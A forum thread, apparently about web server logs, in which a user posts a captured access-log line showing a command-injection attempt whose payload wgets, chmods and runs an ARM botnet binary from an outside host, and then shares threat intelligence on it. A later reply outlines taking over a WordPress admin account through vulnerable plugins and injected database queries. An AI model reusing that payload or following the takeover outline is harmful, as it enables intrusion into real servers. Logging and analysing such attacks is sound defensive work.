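Feed `zgrep -a "GET /" *gz` output straight into `scan_log`; the Referer field is scanned too because the earliest log lines on this thread carried the payload there rather than in the request line.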
 

Asphyxia
Code:
wordpress_http_access.log.3.gz:62.86.203.177 - - [06/Feb/2020:18:04:40 +0000] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1" 400 157 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"


Apparently some Italy scanner bullsh*t using "dark_nexus_qbot", also Dark Nexus is mentioned here https://www.proofpoint.com/us/daily-ruleset-update-summary-20191230

tl;dr scanners are trying to bust WordPress regularly. Interesting intel..

Threat intelligence updated over here: https://otx.alienvault.com/pulse/5e1760de6ed0dd1a18c77feb/history
 

Asphyxia
How can I take over WordPress admin of a target?
Why would you want to take over WordPress admin? It is a matter of finding a vulnerable plugin usually, then you inject malicious database queries to either steal admin, inject your own admin account, or in some way exploit their WordPress installation to gain access.. I could show you an example if you want but I am not doing this for malicious purposes. I think information should be free to learn how to defend..
 